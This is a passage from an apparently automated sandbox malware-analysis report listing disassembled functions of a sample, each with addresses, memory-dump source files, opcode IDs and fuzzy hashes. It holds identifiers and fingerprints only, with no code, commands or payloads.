                                                              • Instruction Fuzzy Hash: 00417171A05A898FF794DF58D4A93F9BBD0EB5A301F50026EC049DB3E2DABA1445C741
                                                              Function 00007FFD3431155D Relevance: .1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: beb4cf70b3b3967ff3cfd963818ad33f4490ad025f22b8c7a99790bc2f0d88d2
                                                              • Instruction ID: 0747a8af0def0d67635fac590b77102d10c07fcaed69bda241f8f6f8c63813fd
                                                              • Opcode Fuzzy Hash: beb4cf70b3b3967ff3cfd963818ad33f4490ad025f22b8c7a99790bc2f0d88d2
                                                              • Instruction Fuzzy Hash: 2631C236B0D2898FEB11FBA8D8652D8BBB0EF47321F1841B7C155C7182DA395549CB91
                                                              Function 00007FFD343112E8 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 788e60875f00e58df834c57a8bc7d41c36bd0a94a59fa802905d2b845e97f60d
                                                              • Instruction ID: fae335efdecbd40a2f13a587a8e833da84ca864061f7fc2b392668cb4172582f
                                                              • Opcode Fuzzy Hash: 788e60875f00e58df834c57a8bc7d41c36bd0a94a59fa802905d2b845e97f60d
                                                              • Instruction Fuzzy Hash: 9A21D421B58A5D0FEB98F76C54A96B976C6EB9E351F5400BAE40DC32D3DC3CAC418381
                                                              Function 00007FFD34310CB9 Relevance: .1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 256420aec1ad9ab30854e83d064619a46b3278a6132e93da082f59897341ab0c
                                                              • Instruction ID: 9b965e2f3437710d2153d9da9f720f62e44ea24b1c98998ee95584185f973411
                                                              • Opcode Fuzzy Hash: 256420aec1ad9ab30854e83d064619a46b3278a6132e93da082f59897341ab0c
                                                              • Instruction Fuzzy Hash: 1821B761B4D39606E378712C6CB12B47FF1DF87200F18017AE09AC7AC3EC2DA815A380
                                                              Function 00007FFD34310868 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 36955580110b393df041b791e93447cc6d5792c634c34d5cbd4acd27cd200c5e
                                                              • Instruction ID: 49e35114efb022fb7c85ceea0ba8416ad6834a132bbb025ca3012a69a83b1983
                                                              • Opcode Fuzzy Hash: 36955580110b393df041b791e93447cc6d5792c634c34d5cbd4acd27cd200c5e
                                                              • Instruction Fuzzy Hash: 6911273299C7584FD761BB2844994EABBF0FB4A215F10053FE59AC3241DA3494058782
                                                              Function 00007FFD34311E1D Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a847fda96e7b94c8570ad9608f41c0ce8f6a7c252be85266d669407004b3419e
                                                              • Instruction ID: 2d3e4ab487d24984600dbaa4195ebe2b256d92a1b1b450e9050dcdfb57d96717
                                                              • Opcode Fuzzy Hash: a847fda96e7b94c8570ad9608f41c0ce8f6a7c252be85266d669407004b3419e
                                                              • Instruction Fuzzy Hash: E301F21198E6D50FD76666A48CB16E27FE4CF8B51070901FAD086CB4A3CC5D5882C361
                                                              Function 00007FFD34311588 Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25faceeb3ca76dfa865c6a9df3b7204186dff8ff1c23f5cdb14a31e8ef631877
                                                              • Instruction ID: 1d3e317fae429a6b52c3fa8bbc98e1cde8604ed8e5f0e00dc1f600c6fce60f40
                                                              • Opcode Fuzzy Hash: 25faceeb3ca76dfa865c6a9df3b7204186dff8ff1c23f5cdb14a31e8ef631877
                                                              • Instruction Fuzzy Hash: E011AC35B096898FEB02FBB8D8A11D9BFB0EF47310F1941B7C090D7182E638565ACB81
                                                              Function 00007FFD34311590 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54e1577b2cc94440e404aeda3bb841f21fb33c2a00dff6cc5999f8eba22f98a1
                                                              • Instruction ID: 3f8523eab045a432cd30afe0124618f5a59e70b78eae65415b461f66c184d20d
                                                              • Opcode Fuzzy Hash: 54e1577b2cc94440e404aeda3bb841f21fb33c2a00dff6cc5999f8eba22f98a1
                                                              • Instruction Fuzzy Hash: D601AD35B096888FEB02FB78C8A11D9BFB0EF07310F1841E7C095D7192DA385649CB81
                                                              Function 00007FFD34311598 Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b1be3e5329b87d62feeb213cfeaa8623c886ad79ed70c8d26b966fda3044c93
                                                              • Instruction ID: 558bd3a3f95f1baab41ee63120ee4a6c343d9739cd5fc94c03d5c19d6e84f025
                                                              • Opcode Fuzzy Hash: 2b1be3e5329b87d62feeb213cfeaa8623c886ad79ed70c8d26b966fda3044c93
                                                              • Instruction Fuzzy Hash: 2A015E35A0D6898FDB02FB78C8A01D9BFB0EF07310F1842E6D185D7192D9385649C745
                                                              Function 00007FFD343115A0 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 333187a0137b63e0a6ad44368464a8f9721890856fc733ed025897b5875e1633
                                                              • Instruction ID: 642638c1666e5eee687134263f6790e335071151d4bfe7d2f67fd880e589f929
                                                              • Opcode Fuzzy Hash: 333187a0137b63e0a6ad44368464a8f9721890856fc733ed025897b5875e1633
                                                              • Instruction Fuzzy Hash: A3016234A4D2899FEB12EB74C8A41DD7FB0AF07304F1842E6D145D7193D93C5A44D745
                                                              Function 00007FFD343246FB Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34320000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55a103812637d333051b723dab04ec49f05019d8547d727c9092f8c9ad90b79e
                                                              • Instruction ID: cc481b321df62d2db64818edca24ffa99e1cfca3434ea72cb8e0a72ae967e0ed
                                                              • Opcode Fuzzy Hash: 55a103812637d333051b723dab04ec49f05019d8547d727c9092f8c9ad90b79e
                                                              • Instruction Fuzzy Hash: ABF05431B8C9074BE654BA1CD8D06B93290EF67350F154175D65EC32C7EF3DE841AA81
                                                              Function 00007FFD34311E50 Relevance: .0, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2fd7ab3bb9ba68d200d7adf817fa6121a90fbdf479bb9c54f73070252be78bf7
                                                              • Instruction ID: 932c471fdf5c69f5096ce101025de2623be87cf9484f69fe274fe4a8b60c1c30
                                                              • Opcode Fuzzy Hash: 2fd7ab3bb9ba68d200d7adf817fa6121a90fbdf479bb9c54f73070252be78bf7
                                                              • Instruction Fuzzy Hash: 2AE02621B5C81907DB7CB5B468B12F17280DB4A618B04027AD01AC32C2CC5D5C818280
                                                              Function 00007FFD34325108 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34320000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 32ba93301b27e784eb2fb684687259cc95d823aec9c9ea40065ac09acac1121f
                                                              • Instruction ID: 3a2e91e5fda34eb3a9df4fa0d0eb49f9dcca3711b04a1e8ed537feae1ce4b21b
                                                              • Opcode Fuzzy Hash: 32ba93301b27e784eb2fb684687259cc95d823aec9c9ea40065ac09acac1121f
                                                              • Instruction Fuzzy Hash: DBD05E30B609094B8B4CB62D8468431B3D1EBAA2067D45278940BC3295ED29ECC68B84
                                                              Function 00007FFD34314D19 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                              • Instruction ID: 57e66128805efbe68af01c42634f20d9939dd33dfb518122a16e1d32f5aa6379
                                                              • Opcode Fuzzy Hash: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                              • Instruction Fuzzy Hash: 0EE0ED20B4801A46FB64B544C8A0BB86290EB4E300F1041B4DA4EE32C1CD3CAE45EB55
                                                              Function 00007FFD343252D8 Relevance: .0, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34320000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 79d83493de7c01b07683cd69dee5ac46e79f697a5d52b715be5ce133f1feafd3
                                                              • Instruction ID: 2f4ab3bfd7e948842535eb7b662b22bf2e4438f7922df5bb58671433e2aa80a4
                                                              • Opcode Fuzzy Hash: 79d83493de7c01b07683cd69dee5ac46e79f697a5d52b715be5ce133f1feafd3
                                                              • Instruction Fuzzy Hash: AED01230B60D084F8B4CF73C88A997073D1EB6E2267D540A9D00ECB2B1E96ADC89C741
                                                              Function 00007FFD34323F7E Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34320000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6df84f31888b591008885dfaef940458559fed0934772b30e4fa2885c12e1b1e
                                                              • Instruction ID: 78f1178d4f38c9cb30a877a7dd440fefa14f1349b94392bacbafd6e1245da97d
                                                              • Opcode Fuzzy Hash: 6df84f31888b591008885dfaef940458559fed0934772b30e4fa2885c12e1b1e
                                                              • Instruction Fuzzy Hash: CEE0EC71E1461E8BE754EB94D8A87BD76B6FF59344F00023AD11DEB291DE382C018B41
                                                              Function 00007FFD34312759 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1c020703e54b54e3b188db8ce449cba95cf2faac2895e34bca5a06e88b04ad7
                                                              • Instruction ID: 3d0aff3558a3801e3f750c97c4ec55503ea4df173992c66d64fbdc3993fcd920
                                                              • Opcode Fuzzy Hash: f1c020703e54b54e3b188db8ce449cba95cf2faac2895e34bca5a06e88b04ad7
                                                              • Instruction Fuzzy Hash: 73D0C771E5C5554BDB91E908C4E47597791FB59340F1542E5D80CE3247C639EE81FB40
                                                              Function 00007FFD34311765 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                              • Instruction ID: 1c9cf5fac5d8172267512b44e27baa82cd5f270016968f4cf4564691329d849c
                                                              • Opcode Fuzzy Hash: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                              • Instruction Fuzzy Hash: BDC08C38655808CFC908FB2DC88890833B0FB0F304BD200A0E10DC7271D629DCC2D781
                                                              Function 00007FFD34310705 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                              • Instruction ID: fa8ec00066e9e00c4be34718b80e61ec940e469dcdf401058b085996d0ffd569
                                                              • Opcode Fuzzy Hash: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                              • Instruction Fuzzy Hash: 7AC08C00FCA80A00A921312A24E60ECA1209BCF210FD01032D30CC2481AC7D2086A592
                                                              Function 00007FFD34310728 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34310000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                              • Instruction ID: 588aafe86a0c45c30edff887fde012fc6bed75a6f9aee07329de2305f253b40e
                                                              • Opcode Fuzzy Hash: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                              • Instruction Fuzzy Hash: 4BB01200DD680E009914317528D70A474005B8F100FC01170D608C1082D8AD10956292
                                                              Function 00007FFD34325DBF Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000032.00000002.3800898056.00007FFD34320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_50_2_7ffd34320000_XUkPLaESKIkbWXdxlvmVntDv.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 99c0cbb2557376d49d0aacbb3acc4d5c1c94a18e875f18da931712d202945757
                                                              • Instruction ID: 191527a3030299743aedaba7d7b9a48c0fa3c9fe98fa727dce5fb758d45eab0f
                                                              • Opcode Fuzzy Hash: 99c0cbb2557376d49d0aacbb3acc4d5c1c94a18e875f18da931712d202945757
                                                              • Instruction Fuzzy Hash: 40B09220B8815A8BE380B940C4A13AA21026F4A340F108831D91E832C289BDA900A692